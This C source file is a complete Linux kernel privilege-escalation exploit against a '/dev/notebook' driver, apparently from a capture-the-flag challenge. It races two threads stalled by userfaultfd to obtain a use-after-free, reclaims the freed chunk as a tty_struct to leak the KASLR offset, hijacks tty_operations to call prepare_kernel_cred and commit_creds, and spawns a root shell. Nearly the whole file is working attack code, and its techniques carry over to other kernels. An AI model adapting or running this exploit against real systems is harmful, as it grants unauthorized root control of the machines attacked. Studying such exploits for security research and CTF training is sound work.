int note_fd = 0;  /* descriptor for /dev/notebook, set in main() */
int tty_fd = 0;   /* descriptor for /dev/ptmx, set in main() */
/* Gates that hold the two racing threads until main() releases them. */
sem_t evil_add_sem, evil_edit_sem;
/* Source buffer handed to UFFDIO_COPY by the fault handler.
 * NOTE(review): the handler copies page_size bytes from this 5-byte literal;
 * confirm that path is never meant to complete. */
static char* page = "abcd";
static int page_size;
/* Kernel symbol addresses without the KASLR slide; main() adds the leaked
 * offset. Presumably taken from this challenge's vmlinux - verify per build. */
size_t PTM_UNIX98_OPS = 0xFFFFFFFF81E8E440;
size_t PTY_UNIX98_OPS = 0xFFFFFFFF81E8E320;
size_t WORK_FOR_CPU_FN = 0xffffffff8109eb90;
size_t PREPARE_KERNEL_CRED = 0xffffffff810a9ef0;
size_t COMMIT_CREDS = 0xffffffff810a9b40;
/* Argument block copied by the driver's ioctl handler (24 bytes). */
struct userarg{
    size_t idx;
    size_t size;
    void* buf;
};
/* Print a labelled address. The value is cast to void * because callers
 * pass both pointers and size_t values and %p requires a void * argument. */
#define PRINT_ADDR(str, x) printf("\033[0m\033[1;34m[+]%s \033[0m:%p\n", str, (void *)(x))
void saveStatus();
void info_log(char*);
void error_log(char*);
int userfaultfd_attack(char* addr, unsigned long len, void (*handler)(void *));
static void* fault_handler_thread(void * arg);
void addnote(size_t idx, size_t size, char* buf);
void editnote(size_t idx, size_t size, char* buf);
void deletenote(size_t idx);
void gift(char* buf);
void bind_cpu(int);
/* User-mode register snapshot filled in by saveStatus(). */
size_t user_cs, user_ss,user_rflags,user_sp;
/* Snapshot the current user-mode cs, ss, rsp and rflags into the globals
 * user_cs, user_ss, user_sp and user_rflags, then log a confirmation.
 * NOTE(review): the operands are written destination-first (Intel syntax),
 * so this presumably needs -masm=intel when building - confirm. */
void saveStatus(){
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
);
info_log("States has been saved successfully!");
}
/* Write `str` to stdout as a bold green "[+]" line, then reset attributes. */
void info_log(char* str){
    const char *text = str;

    fprintf(stdout, "\033[0m\033[1;32m[+]%s\033[0m\n", text);
}
/* Write `str` to stdout as a bold red "[-]" line and exit with status 1. */
void error_log(char* str){
    const char *text = str;

    fprintf(stdout, "\033[0m\033[1;31m[-]%s\033[0m\n", text);
    exit(1);
}
/*
 * Pin the calling process to a single CPU core so the exploit runs on that
 * core only.
 *
 * core: index of the CPU to bind to.
 *
 * Best effort: if sched_setaffinity() fails, the error is reported via
 * perror() and the function returns without logging success; the caller
 * continues unpinned.
 */
void bind_cpu(int core)
{
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    if (sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set) == -1) {
        perror("sched_setaffinity");
        return;
    }
    info_log("CPU bind succesfully");
}
/*
 * Create a userfaultfd object, register [addr, addr + len) for missing-page
 * faults, and start a thread that services the resulting events.
 *
 * addr:    start of the range to monitor.
 * len:     length of the range in bytes.
 * handler: thread entry point; it receives the userfaultfd descriptor cast
 *          to void *. The parameter is declared as returning void, but it is
 *          handed to pthread_create(), so the function passed in must really
 *          have the void *(*)(void *) start-routine signature.
 *
 * Returns 0 on success. Every failure path terminates the process through
 * errExit(), so no error value is ever returned.
 */
int userfaultfd_attack(char* addr, unsigned long len, void (*handler)(void *)){
    long uffd;
    struct uffdio_api uffdio_api;
    struct uffdio_register uffdio_register;
    pthread_t monitor_thread;
    int s;

    PRINT_ADDR("starting to monitor", addr);

    /* Create and enable userfaultfd object */
    uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
    if(uffd == -1)
        errExit("userfaultfd");
    uffdio_api.api = UFFD_API;
    uffdio_api.features = 0;
    if(ioctl(uffd, UFFDIO_API, &uffdio_api) == -1)
        errExit("ioctl-UFFDIO_API");

    /* Ask to be notified about accesses to not-yet-populated pages */
    uffdio_register.range.start = (unsigned long) addr;
    uffdio_register.range.len = len;
    uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
    if(ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1)
        errExit("ioctl-UFFDIO_REGISTER");

    /* Create a thread that will process the userfaultfd events.
     * The cast restores the start-routine type pthread_create() expects. */
    s = pthread_create(&monitor_thread, NULL, (void *(*)(void *))handler, (void *)uffd);
    if(s != 0){
        /* pthread_create reports errors through its return value, not errno */
        errno = s;
        errExit("pthread_create");
    }
    info_log("create thread...");
    return 0;
}
/*
 * userfaultfd monitor thread. `arg` carries the userfaultfd descriptor cast
 * to void *. The loop polls the descriptor, reads one event, then sleeps
 * for 10000 seconds before resolving the fault with UFFDIO_COPY, so the
 * faulting thread stays blocked for that long. The loop never exits, so
 * the function never returns normally.
 */
static void* fault_handler_thread(void * arg){
static struct uffd_msg msg; /* data read from userfaultfd */
static int fault_cnt = 0; /* fault counter; never updated in this function */
long uffd; /* userfaultfd file descriptor */
struct uffdio_copy uffdio_copy;
ssize_t nread;
uffd = (long)arg;
/* Loop, handling incoming events on the userfaultfd file descriptor */
for(;;){
/* See what poll() tells us about the userfaultfd */
struct pollfd pollfd;
int nready;
pollfd.fd = uffd;
pollfd.events = POLLIN;
nready = poll(&pollfd, 1, -1);
if(nready == -1)
errExit("poll");
/* Read an event from the userfaultfd */
info_log("catch the user page fault!");
nread = read(uffd, &msg, sizeof(msg));
/* Deliberate stall: keep the faulting thread blocked inside its
 * user-memory access while the other threads run */
sleep(10000);
if(nread == 0){
printf("EOF on userfaultfd!\n");
exit(EXIT_FAILURE);
}
if(nread == -1)
errExit("read");
/* We expect only one kind of event; verify that assumption */
if(msg.event != UFFD_EVENT_PAGEFAULT){
fprintf(stderr, "Unexpected event on userfaultfd\n");
exit(EXIT_FAILURE);
}
/* Copy the replacement page to the faulting address.
 * NOTE(review): `page` points at a 5-byte string literal while len is
 * page_size - confirm this copy is never expected to run. */
uffdio_copy.src = (unsigned long) page;
/* We need to handle page faults in units of pages(!).
 * So, round faulting address down to page boundary */
uffdio_copy.dst = (unsigned long)msg.arg.pagefault.address & ~(page_size - 1);
uffdio_copy.len = page_size;
uffdio_copy.mode = 0;
uffdio_copy.copy = 0;
if(ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1)
errExit("ioctl-UFFDIO_COPY");
}
}
void addnote(size_t idx, size_t size, char* buf){
struct userarg userargs;
userargs.idx = idx;
userargs.size = size;
userargs.buf = buf;
ioctl(note_fd, 0x100, &userargs);
}
void gift(char* buf){
struct userarg userargs;
userargs.idx = 0;
userargs.size = 10;
userargs.buf = buf;
ioctl(note_fd, 0x64, &userargs);
}
void editnote(size_t idx, size_t size, char* buf){
struct userarg userargs;
userargs.idx = idx;
userargs.size = size;
userargs.buf = buf;
ioctl(note_fd, 0x300, &userargs);
}
void deletenote(size_t idx){
struct userarg userargs;
userargs.idx = idx;
userargs.size = 0x10;
userargs.buf = 0;
ioctl(note_fd, 0x200, &userargs);
}
/*
 * Racing thread: waits on evil_add_sem, then calls addnote(0, 0x60, uffd_arg).
 * uffd_arg is the buffer handed to the driver; main() passes the
 * userfaultfd-monitored mapping here.
 * Returns NULL; the void * return type is what pthread_create() requires of
 * a start routine.
 */
void *thread_add(void* uffd_arg){
    sem_wait(&evil_add_sem);
    addnote(0, 0x60, uffd_arg);
    return NULL;
}
/*
 * Racing thread: waits on evil_edit_sem, then calls editnote(0, 0, uffd_arg),
 * i.e. asks the driver to resize slot 0 to size 0.
 * uffd_arg is the buffer handed to the driver; main() passes the
 * userfaultfd-monitored mapping here.
 * Returns NULL; the void * return type is what pthread_create() requires of
 * a start routine.
 */
void *thread_edit(void* uffd_arg){
    sem_wait(&evil_edit_sem);
    editnote(0, 0, uffd_arg);
    return NULL;
}
/*
 * Exploit driver. Sequence:
 *   1. Pin to CPU 0, open /dev/notebook, map one page and register it with
 *      userfaultfd.
 *   2. Create slot 0, grow it to 0x2e0, then release the edit thread
 *      (editnote size 0) and the add thread (addnote size 0x60), both using
 *      the monitored page as their buffer.
 *   3. Open /dev/ptmx and read slot 0 back, expecting a tty_struct there.
 *   4. Derive the kernel offset from the ops pointer at word 3.
 *   5. Use slot 1 as a fake ops table whose entry 12 is work_for_cpu_fn and
 *      trigger it twice through ioctl() on the tty: first with
 *      PREPARE_KERNEL_CRED, then with COMMIT_CREDS on the returned value.
 *   6. Restore the saved tty_struct bytes and spawn a shell.
 *
 * read()/write() on note_fd pass a note INDEX as the third argument, not a
 * byte count; the driver copies the slot's stored size.
 *
 * Returns 0 after the shell exits; setup failures terminate the process.
 */
int main(void){
    /* Zero-initialised so the later memcpy()s never read indeterminate data. */
    size_t fake_tty_struct[0x100] = {0}, orig_tty_struct[0x100] = {0};
    size_t fake_tty_operations_addr;
    size_t vmlinux_offset;
    /* Slot 1 is resized to 0x2e0 below and write(note_fd, buf, 1) makes the
     * driver read that many bytes from buf, so buf must be at least 0x2e0
     * bytes long (the previous 0x30 words were only 0x180 bytes). */
    size_t buf[0x100] = {0};
    char* user_mmap;
    pthread_t thread_1, thread_2;

    bind_cpu(0);
    page_size = sysconf(_SC_PAGE_SIZE);
    note_fd = open("/dev/notebook", 2);
    if(note_fd < 0)
        errExit("open /dev/notebook");

    /* construct a monitored zone */
    user_mmap = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
    if(user_mmap == MAP_FAILED)
        errExit("mmap");
    /* The handler really has the pthread start-routine signature; the cast
     * only adapts it to userfaultfd_attack()'s declared parameter type. */
    userfaultfd_attack(user_mmap, 0x1000, (void (*)(void *))fault_handler_thread);

    /* init the semaphores with value 0 so both threads block until posted */
    sem_init(&evil_add_sem, 0, 0);
    sem_init(&evil_edit_sem, 0, 0);
    if(pthread_create(&thread_1, NULL, thread_add, (void*)user_mmap) != 0)
        error_log("pthread_create(thread_add) failed");
    if(pthread_create(&thread_2, NULL, thread_edit, (void*)user_mmap) != 0)
        error_log("pthread_create(thread_edit) failed");

    addnote(0, 0x50, (char *)buf);
    editnote(0, 0x2e0, (char *)buf);
    sem_post(&evil_edit_sem); //we could run the thread_edit to get a UAF
    sleep(1);
    sem_post(&evil_add_sem); //use that to modify the size from 0 to non-zero
    sleep(1);

    /* now we get a UAF chunk(0x2e0) with non-zero size, so we can get the tty_struct */
    info_log("try to get the tty_struct");
    tty_fd = open("/dev/ptmx", 2);
    if(tty_fd < 0){
        error_log("ptmx open failed");
    }
    read(note_fd, orig_tty_struct, 0);
    /* The low 32 bits of the first word must be the tty magic 0x5401;
     * otherwise the freed chunk was not reused by the tty (may fail). */
    if((unsigned int)orig_tty_struct[0] != 0x5401){
        error_log("pity,get a wrong tty!");
    }
    info_log("get right tty_struct!congratulation!");

    /* get the kernel base offset: word 3 is the ops pointer, and its low 12
     * bits tell which of the two candidate ops tables it is */
    vmlinux_offset = ((orig_tty_struct[3]&0xfff) == 0x440) ? (orig_tty_struct[3] - PTM_UNIX98_OPS): (orig_tty_struct[3] - PTY_UNIX98_OPS);
    PRINT_ADDR("vmlinux_offset", vmlinux_offset);

    /* hijack the tty_operations */
    memcpy(fake_tty_struct, orig_tty_struct, 0x100);
    addnote(1, 0x60, (char *)buf);
    editnote(1, 0x2e0, (char *)buf);
    gift((char *)buf);
    /* buf now holds the notebook array; word 2 is slot 1's buffer address */
    fake_tty_operations_addr = buf[2];
    fake_tty_struct[3] = buf[2];
    PRINT_ADDR("fake_tty_fops", fake_tty_struct[3]);
    write(note_fd, fake_tty_struct,0);
    buf[12] = WORK_FOR_CPU_FN + vmlinux_offset;
    write(note_fd, buf, 1);
    info_log("hijack done !");

    /* construct the gadget */
    /* prepare_kernel_cred(NULL): function at +0x20, argument at +0x28 */
    memcpy(fake_tty_struct, orig_tty_struct, 0x2e0);
    fake_tty_struct[3] = fake_tty_operations_addr;
    fake_tty_struct[4] = PREPARE_KERNEL_CRED + vmlinux_offset;
    fake_tty_struct[5] = 0;
    write(note_fd, fake_tty_struct, 0);
    ioctl(tty_fd, 0x114514, 0x114514);

    /* commit_creds: the previous call's result was stored at +0x30 (word 6) */
    read(note_fd, buf, 0);
    fake_tty_struct[5] = buf[6];
    fake_tty_struct[4] = COMMIT_CREDS + vmlinux_offset;
    write(note_fd, fake_tty_struct, 0);
    ioctl(tty_fd, 0x123, 0x123);

    /* privilege escalation finished */
    /* recover the tty_struct */
    write(note_fd, orig_tty_struct, 0);
    system("/bin/sh");
    return 0;
}